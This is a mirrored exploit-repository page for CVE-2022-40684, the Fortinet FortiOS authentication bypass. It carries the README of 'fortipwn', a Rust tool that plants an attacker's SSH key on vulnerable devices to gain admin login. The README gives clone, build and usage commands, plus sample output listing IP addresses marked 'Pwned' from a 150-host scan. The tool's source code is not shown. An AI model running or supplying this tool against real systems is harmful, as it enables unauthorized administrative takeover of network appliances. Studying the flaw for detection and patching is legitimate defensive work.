CVE-2022-40684 PoC — Fortinet FortiOS 授权问题漏洞

Source

Associated Vulnerability

Title:Fortinet FortiOS 授权问题漏洞 (CVE-2022-40684)
Description:An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.

Description

Forti CVE-2022-40684 enumeration script built in Rust

Readme

# fortipwn

Forti CVE-2022-40684 enumeration script built in Rust.

Uploads an SSH public key into authorized_keys, allowing an attacker to SSH into a server running FortiOS as admin.

# Usage
```console
$ ./fortipwn <hosts.txt> <id_rsa.pub>
```

# Build
```console
$ git clone https://github.com/Grapphy/fortipwn/
$ cd fortipwn
$ cargo build --release
$ cd target/release/
$ ./fortipwn <host.txt> <id_rsa.pub>
```

# Output
```console
$ ./fortipwn examples_ip.txt id_rsa.pub
Checking for 150 hosts. You might log-in through ssh as admin@host on pwned hosts.
Pwned: 210.29.110.143
Pwned: 144.14.71.122
Pwned: 21.220.10.82
Pwned: 163.123.102.32
Pwned: 121.159.192.10
Pwned: 162.49.194.19
Pwned: 185.92.20.40
Pwned: 194.19.211.19
Finished scanning
```

File Snapshot


 [4.0K]  /data/pocs/51935e9c1e8d1c58251fc43c13dc3024cd376d29
├── [ 25K]  Cargo.lock
├── [ 395]  Cargo.toml
├── [ 750]  README.md
├── [4.0K]  src
│   ├── [1.1K]  cve.rs
│   ├── [  13]  lib.rs
│   └── [1.0K]  main.rs
└── [4.0K]  tests
    └── [ 867]  integration_test.rs

3 directories, 7 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!